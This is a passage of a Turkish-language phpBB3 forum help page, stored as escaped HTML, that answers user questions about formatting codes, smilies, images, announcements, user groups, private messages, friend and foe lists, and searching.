se\u00e7eneklerini kullanabilirsiiz (ayn\u0131 zamanda iletilerinize g\u00f6re bu se\u00e7ene\u011fi iptal edebilirsiniz). Bi\u00e7im kodlar\u0131 HTML stillerine benzer, kodlar &lt; ve &gt; yerine k\u00f6\u015feli parantez i\u00e7ine yaz\u0131l\u0131r [ve] ve bazen uygulanmayabilir. Daha ayr\u0131nt\u0131l\u0131 bilgi i\u00e7in ileti penceresindeki bi\u00e7im kodlar\u0131 rehberine bakabilirsiniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r1\"></a><b>&#187; HTML kullanabilir miyim?</b></div>\n\t\t\t\t<div class=\"postbody\">Hay\u0131r, bu panoda HTML kullanarak ileti g\u00f6ndermeniz m\u00fcmk\u00fcn de\u011fildir. HTML ile ger\u00e7ekle\u015ftirebilece\u011finiz de\u011fi\u015fikliklerin bir \u00e7o\u011fu bi\u00e7im kodlar\u0131 kullan\u0131larak yap\u0131labilir.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r2\"></a><b>&#187; \u0130fadeler nedir?</b></div>\n\t\t\t\t<div class=\"postbody\">\u0130fadeler k\u00fc\u00e7\u00fck resimlerdir ve k\u0131sa kodlar kullanarak baz\u0131 hislerinizi resmetmenizi sa\u011flar, \u00f6rne\u011fin; :) mutlu oldu\u011funuz, :( \u00fczg\u00fcn oldu\u011funuz anlam\u0131na gelir. \u0130fadeleri tam listesi ileti formunda g\u00f6sterilmektedir. A\u015f\u0131r\u0131 ifade kullan\u0131m\u0131ndan ka\u00e7\u0131nmal\u0131s\u0131n\u0131z, bu okunabilirli\u011fi azalt\u0131r ve bu iletiler yetkilerce d\u00fczenlenebilir ya da silinebilir. Pano y\u00f6neticisi iletilerde kullan\u0131labilecek ifade say\u0131s\u0131nda k\u0131s\u0131tlamaya gidebilir.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r3\"></a><b>&#187; Resim g\u00f6nderebilir miyim?</b></div>\n\t\t\t\t<div class=\"postbody\">Evet, iletilerinizde resim g\u00f6sterebilirsiniz. E\u011fer y\u00f6netici eklenti y\u00fcklemenize izin veriyorsa, panoya da resim y\u00fckleyebilirisniz. Aksi takdirde, \u015fifrelenmemi\u015f bir alana y\u00fckleyece\u011finiz resme http://www.example.com/my-picture.gif gibi bir ba\u011flant\u0131 vermeniz gerekir. Bilgisayar\u0131n\u0131zdaki bir resmin linkini (bilgisayar\u0131n\u0131z kamuya a\u00e7\u0131k bir sunucu de\u011filse) ve hotmail, yahoo gibi bir \u015fifrelenmi\u015f alanda y\u00fckl\u00fc ise link veremezsiniz. Resimlerinizi g\u00f6stermek i\u00e7in [img] bi\u00e7im kodunu kullanabilirsiniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r4\"></a><b>&#187; Genel duyuru nedir?</b></div>\n\t\t\t\t<div class=\"postbody\">Genel duyurular \u00f6nemli bilgileri bar\u0131nd\u0131r\u0131r ve m\u00fcmk\u00fcn oldu\u011fu kadar \u00e7abuk okuman\u0131z gerekir. Genel duyurular her forumun en \u00fcst k\u0131sm\u0131nda ve Kullan\u0131c\u0131 Kontrol Panelinde g\u00f6r\u00fcnt\u00fclenir. Genel duyuru g\u00f6nderip g\u00f6nderememeniz gerekli olan izinlerin verilmi\u015f olmas\u0131na ba\u011fl\u0131d\u0131r, bu izinler y\u00f6netici taraf\u0131ndan ayarlan\u0131r.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r5\"></a><b>&#187; Duyuru nedir?</b></div>\n\t\t\t\t<div class=\"postbody\">Duyurular okumakta oldu\u011funuz forum ile ilgili \u00f6nemli bilgileri i\u00e7erir ve m\u00fcmk\u00fcn oldu\u011fu kadar k\u0131sa zamanda okunmal\u0131d\u0131r. Duyurular forumda g\u00f6nderilen iletilerin \u00fcst k\u0131sm\u0131nda g\u00f6sterilir. Genel duyurularda oldu\u011fu gibi, duyuru g\u00f6nderip g\u00f6nderememeniz gerekli olan izinlerin verilmi\u015f olmas\u0131na ba\u011fl\u0131d\u0131r, bu izinler y\u00f6netici taraf\u0131ndan ayarlan\u0131r.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r6\"></a><b>&#187; Sabit konu nedir?</b></div>\n\t\t\t\t<div class=\"postbody\">Sabit ba\u015fl\u0131klar forumlarda duyurular\u0131n alt\u0131nda ve sadece ilk sayfada g\u00f6sterilir. Genel olarak okuman\u0131z gereken \u00f6nemli bilgileri bar\u0131nd\u0131r\u0131r. Genel duyurularda ve duyurularda oldu\u011fu gibi, sabit ba\u015fl\u0131k g\u00f6nderip g\u00f6nderememeniz gerekli olan izinlerin verilmi\u015f olmas\u0131na ba\u011fl\u0131d\u0131r, bu izinler y\u00f6netici taraf\u0131ndan ayarlan\u0131r.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r7\"></a><b>&#187; Kilitli konu nedir?</b></div>\n\t\t\t\t<div class=\"postbody\">Kilitli konular, kullan\u0131c\u0131lar\u0131n art\u0131k ileti g\u00f6nderemeyece\u011fi ya da anketlerinde oy verme s\u00fcresi dolan ba\u015fl\u0131klard\u0131r. Ba\u015fl\u0131klar pano yetkili ya da y\u00f6neticilerinin ayarlamalar\u0131yla bir \u00e7ok sebepten dolay\u0131 kilitlenmi\u015f olabilir. Ayn\u0131 zamanda e\u011fer ilgili izinler y\u00f6netici taraf\u0131ndan verilmi\u015fse siz de kendi a\u00e7t\u0131\u011f\u0131n\u0131z ba\u015fl\u0131klar\u0131 kilitleyebilirsiniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r8\"></a><b>&#187; Konu ikonu nedir?</b></div>\n\t\t\t\t<div class=\"postbody\">Konu ikonlar\u0131 iletilerin i\u00e7eri\u011fiyle ilgili resimlerdir. Ba\u015fl\u0131k ikonu kullan\u0131p kullanamaman\u0131z y\u00f6neticilerin verece\u011fi izinlere ba\u011flad\u0131r.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t\t\t</table>\n\n\t\t<br clear=\"all\" />\n\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">\n\t\t<tr> \n\t\t\t<td class=\"cat\" align=\"center\"><h4>Kullan\u0131c\u0131 Seviyeleri ve Gruplar</h4></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r0\"></a><b>&#187; Y\u00f6netici nedir?</b></div>\n\t\t\t\t<div class=\"postbody\">Y\u00f6neticiler panodaki en \u00fcst d\u00fczeyde kontrol hakk\u0131na sahip olan \u00fcyelerdir. Bu \u00fcyeler izinleri ayarlama, \u00fcyeleri uzakla\u015ft\u0131rma, kullan\u0131c\u0131 gruplar\u0131 ve yetkilileri olu\u015fturma gibi b\u00fct\u00fcn kontrollere h\u00fckmetme di\u011fer pano y\u00f6neticilerinin ve pano kurucusunun izinlerine ba\u011fl\u0131 kalarak hareket etme hakk\u0131na sahiptir. Ayn\u0131 zamanda yetkilerinin forumlar\u0131nda sahip oldu\u011fu b\u00fct\u00fcn d\u00fczenleme yeteneklerine de sahip olup, pano kurucusuna ba\u011f\u0131ml\u0131 olarak hareket ederler.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r1\"></a><b>&#187; Yetkili nedir?</b></div>\n\t\t\t\t<div class=\"postbody\">Yetkililer (yayg\u0131n ad\u0131 ile moderat\u00f6r) bireysel (ya da grup olarak) g\u00fcn be g\u00fcn y\u00f6netikleri forumlar\u0131 g\u00f6zlemlemek g\u00f6revini \u00fcstlenmi\u015f olan kimselerdir. Y\u00f6nettikleri forumlarda iletileri d\u00fczenleme, silme ya da kilitleme, kilitli iletiyi a\u00e7ma, ta\u015f\u0131ma ya da ba\u015fl\u0131klar\u0131 b\u00f6lme g\u00fcc\u00fcne sahiptirler. Genellikle yetkililer kapal\u0131 ba\u015fl\u0131klar\u0131 ve olumsuz materyal ihtiva eden iletileri engellemekle g\u00f6revlendirilirler.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r2\"></a><b>&#187; Kullan\u0131c\u0131 grubu nedir?</b></div>\n\t\t\t\t<div class=\"postbody\">Kullan\u0131c\u0131 gruplar\u0131n\u0131 pano y\u00f6neticileri olu\u015ftururlar. Her kullan\u0131c\u0131 birden fazla gruba \u00fcye olabilir (bu durum panodan panoya de\u011fi\u015fiklik g\u00f6sterebilir) ve her grubun kendine has giri\u015f izinleri olabilir. Bu y\u00f6neticinin her forum i\u00e7in birden fazla yetkili atamas\u0131n\u0131 kolayla\u015f\u0131t\u0131r, ya da \u00fcyelerin \u00f6zel forumlara giri\u015flerine imkan sa\u011flar.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r3\"></a><b>&#187; Kullan\u0131c\u0131 gruplar\u0131 nerede ve bir gruba nas\u0131l kat\u0131l\u0131r\u0131m?</b></div>\n\t\t\t\t<div class=\"postbody\">Kullan\u0131c\u0131 Kontrol Panelinizdeki \u201cKullan\u0131c\u0131 Gruplar\u0131\u201d linkini t\u0131klayarak kullan\u0131c\u0131 gruplar\u0131n\u0131 g\u00f6rebilirsiniz. E\u011fer bu gruplardan birine kat\u0131lmak istiyorsan\u0131z, ilgili butonu t\u0131klaman\u0131z yeterlidir. B\u00fct\u00fcn gruplar a\u00e7\u0131k giri\u015fli de\u011fildir. Baz\u0131lar\u0131 kat\u0131lman\u0131z i\u00e7in onay gerektirebilir ve baz\u0131lar\u0131 tamamen gizli grup \u00fcyeli\u011fine sahip olabilir. E\u011fer grup a\u00e7\u0131k ise ilgili butonu t\u0131klayarak gruba kat\u0131labilirsiniz. E\u011fer onay gerektiren bir gruba kat\u0131lmak istiyorsan\u0131z yine ilgili butonu t\u0131klayarak ba\u015fvurabilirsiniz. Kullan\u0131c\u0131 Grubu lider gruba neden kat\u0131lmak istedi\u011finizi sorma yetkisine sahiptir. L\u00fctfen, talebinizin geri \u00e7evirilmesi durumunda grup liderine bask\u0131 yapmay\u0131n.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r4\"></a><b>&#187; Nas\u0131l bir grup lideri olabilirim?</b></div>\n\t\t\t\t<div class=\"postbody\">Y\u00f6netici taraf\u0131ndan bir Kullan\u0131c\u0131 Grubu olu\u015fturuldu\u011fu zaman, ayn\u0131 zamanda Grup Liderini de atam\u0131\u015f olur E\u011fer bur kullan\u0131c\u0131 grubu olu\u015fturmak istiyorsan\u0131z ilk olarak y\u00f6netici ile irtibat kurman\u0131z gerekir, bunun i\u00e7in y\u00f6neticiye bir \u00f6zel mesaj g\u00f6nderebilirisniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r5\"></a><b>&#187; Neden baz\u0131 gruplar farkl\u0131 renkte g\u00f6r\u00fcn\u00fcyor?</b></div>\n\t\t\t\t<div class=\"postbody\">Muhtemelen pano y\u00f6neticisi grup \u00fcyelerini daha kolay tan\u0131yabilmek i\u00e7in \u00fcyelerine bir renk atam\u0131\u015ft\u0131r</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r6\"></a><b>&#187; \u201cVarsay\u0131lan Kullan\u0131c\u0131 Grubu\u201d nedir?</b></div>\n\t\t\t\t<div class=\"postbody\">E\u011fer birden fazla kullan\u0131c\u0131 grubuna \u00fcye iseniz, varsay\u0131lan grubunuz renk ve r\u00fctbe ile g\u00f6sterilen gruptur. Pano y\u00f6neticisi Kullan\u0131c\u0131 Paneli \u00fczerinden varsay\u0131lan izinlerinizi de\u011fi\u015ftirebilir.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r7\"></a><b>&#187; \u201cY\u00f6netim ekibi\u201d ba\u011f\u0131 nedir?</b></div>\n\t\t\t\t<div class=\"postbody\">Bu sayfa size pano g\u00f6revlilerinin bir listesini sa\u011flar, bu liste y\u00f6neticileri ve yetkileri hangi sayfalarda yetkili olduklar\u0131 bilgisiyle birlikte g\u00f6sterir.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t\t\t</table>\n\n\t\t<br clear=\"all\" />\n\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">\n\t\t<tr> \n\t\t\t<td class=\"cat\" align=\"center\"><h4>\u00d6zel Mesajla\u015fma</h4></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f5r0\"></a><b>&#187; \u00d6zel mesaj g\u00f6nderemiyorum!</b></div>\n\t\t\t\t<div class=\"postbody\">Bunun \u00fc\u00e7 sebebi vard\u0131r; kaydolmam\u0131\u015f ve/veya \u00e7evirimi\u00e7i giri\u015f yapmam\u0131\u015fs\u0131n\u0131zd\u0131r, pano y\u00f6neticisi pano \u00fczerinde \u00f6zel mesaj g\u00f6nderme iznini iptal etmi\u015ftir, ya da y\u00f6netici mesaj g\u00f6ndermenizi engellemi\u015ftir. E\u011fer son durum s\u00f6z konusu ise sebebini \u00f6\u011frenmek i\u00e7in pano y\u00f6neticisiyle irtibata ge\u00e7ebilirsiniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f5r1\"></a><b>&#187; \u0130stenmeyen \u00f6zel mesajlar almaya devam ediyorum!</b></div>\n\t\t\t\t<div class=\"postbody\">Kontrol panelinizdeki mesaj kurallar\u0131n\u0131 kullanarak bir \u00fcyenin size \u00f6zel mesaj g\u00f6ndermesini engelleyebilirsiniz. E\u011fer \u00fcyelerden birinden ho\u015f olmayan \u00f6zel mesajlar al\u0131yorsan\u0131z konuyu y\u00f6neticiye iletebilirsiniz, y\u00f6neticiler bir kullan\u0131c\u0131n\u0131n \u00f6zel mesaj g\u00f6ndermesini tamamen engelleyebiliriler. Daha fazla bilgi i\u00e7in y\u00f6netici ile irtibata ge\u00e7ebilirsiniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f5r2\"></a><b>&#187; Bu pano \u00fcyelerinden birinden istenmeyen ya da olumsuz i\u00e7erikli e-posta al\u0131yorum!</b></div>\n\t\t\t\t<div class=\"postbody\">Bunu duydu\u011fumuz i\u00e7in \u00fczg\u00fcn\u00fcz. Bu panonun e-posta formu bu \u015fekilde posta g\u00f6ndermek isteyenleri engellemek ve vazge\u00e7irmek i\u00e7in ki\u015fisel g\u00fcvenlik \u00f6zellikleri i\u00e7ermektedir. Pano y\u00f6neticisine ald\u0131\u011f\u0131n\u0131z e-postan\u0131n tam bir kopyas\u0131n\u0131 g\u00f6ndermelisiniz, ba\u015fl\u0131k k\u0131sm\u0131n\u0131n (bu kullan\u0131c\u0131n\u0131n g\u00f6nderdi\u011fi e-postan\u0131n ayr\u0131nt\u0131lar\u0131n\u0131n bir listesini verir) g\u00f6nerilmesi \u00e7ok \u00f6nemlidir. B\u00f6ylelikle pano y\u00f6neticisi harekete ge\u00e7ebilir.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t\t\t</table>\n\n\t\t<br clear=\"all\" />\n\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">\n\t\t<tr> \n\t\t\t<td class=\"cat\" align=\"center\"><h4>Arkada\u015flar ve Yasakl\u0131lar</h4></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f6r0\"></a><b>&#187; Arkada\u015flar\u0131m ve yasakl\u0131lar listesi nedir?</b></div>\n\t\t\t\t<div class=\"postbody\">Bu listeleri kullanarak panoya kay\u0131tl\u0131 di\u011fer kullan\u0131c\u0131lar\u0131 organize edebilirsiniz. Arkada\u015flar\u0131m listesine ekledi\u011finiz \u00fcyeler Kullan\u0131c\u0131 Panelinizde kolay ula\u015f\u0131m\u0131n\u0131z\u0131 sa\u011flamak i\u00e7in listenecektir, b\u00f6ylece listenizdekilerin \u00e7evirimi\u00e7i durumlar\u0131n\u0131 g\u00f6rebilir ve \u00f6zel mesaj g\u00f6nderebilirsiniz. Tema deste\u011fine g\u00f6re bu \u00fcyelerin g\u00f6nderece\u011fi iletiler farkl\u0131 bir renkle g\u00f6sterilecektir. E\u011fer bir kullan\u0131c\u0131y\u0131 yasaklananlar listenize eklerseniz, bu listedekilerin iletileri varsay\u0131lan ayar olarak gizlenecektir.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f6r1\"></a><b>&#187; Arkada\u015flar\u0131m / yasakl\u0131lar listesine kullan\u0131c\u0131lar\u0131 nas\u0131l eklerim?</b></div>\n\t\t\t\t<div class=\"postbody\">Pano kullan\u0131c\u0131lar\u0131n\u0131 iki yolla bu listelere eklersiniz. \u00dcyenin profilinde bulunan \u201cArkada\u015f ekle\u201d ya da \u201cYasakl\u0131 \u00fcye ekle\u201d ba\u011flant\u0131lar\u0131n\u0131 kullanabilirsiniz. Buna alternatif olarak Kullan\u0131c\u0131 Panelinizden, do\u011furdan \u00fcyelerin adlar\u0131n\u0131 yazarak da ekleyebilirsiniz. Ayn\u0131 zamanda ayn\u0131 sayfay\u0131 kullanarak daha \u00f6nce ekledi\u011finiz bir ki\u015fiyi de listenizden \u00e7\u0131karabilirisniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t\t\t</table>\n\n\t\t<br clear=\"all\" />\n\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">\n\t\t<tr> \n\t\t\t<td class=\"cat\" align=\"center\"><h4>Forumlarda Arama</h4></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f7r0\"></a><b>&#187; Bir forumda veya forumlarda nas\u0131l arama yapar\u0131m?</b></div>\n\t\t\t\t<div class=\"postbody\">Pano anasayfa, forum ya da ba\u015fl\u0131k g\u00f6sterim sayfas\u0131ndaki arama kutusuna aramak istedi\u011finiz terim ya da s\u00f6zc\u00fckleri girerek arama yapabilirisniz. Ayr\u0131ca b\u00fct\u00fcn sayfalarda mevcut olan geli\u015fmi\u015f arama ba\u011flant\u0131s\u0131na t\u0131klayarak da arama \u00f6zelli\u011fini kullanabilirsiniz. Nas\u0131l arama yapaca\u011f\u0131n\u0131z kullan\u0131lan temaya ba\u011fl\u0131d\u0131r.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f7r1\"></a><b>&#187; Neden \u201cSonu\u00e7 bulunamad\u0131\u201d hatas\u0131n\u0131 al\u0131yorum?</b></div>\n\t\t\t\t<div class=\"postbody\">Aramak \u00fczere girmi\u015f oldu\u011funuz s\u00f6zc\u00fckler \u00e7ok belirsiz ya da \u00e7ok fazla kullan\u0131lan ve phpBB3 taraf\u0131ndan listelenemeyecek s\u00f6zc\u00fckler olabilir. Daha \u00f6zel bir girdi belirleyin ve geli\u015fmi\u015f arama sayfas\u0131ndaki \u00f6zellikleri kullanmay\u0131 deneyin.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f7r2\"></a><b>&#187; Neden arama sonucunda bo\u015f bir sayfaya d\u00f6n\u00fcyorum!?</b></div>\n\t\t\t\t<div class=\"postbody\">Sunucuda bar\u0131nan \u00e7ok fazla sonu\u00e7 oldu\u011fundan bu sonucu al\u0131yorsunuz. Geli\u015fmi\u015f arama se\u00e7ene\u011fini kullan\u0131n ve daha \u00f6zel bir girdi ile ve forumlarda aramay\u0131 deneyin.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" 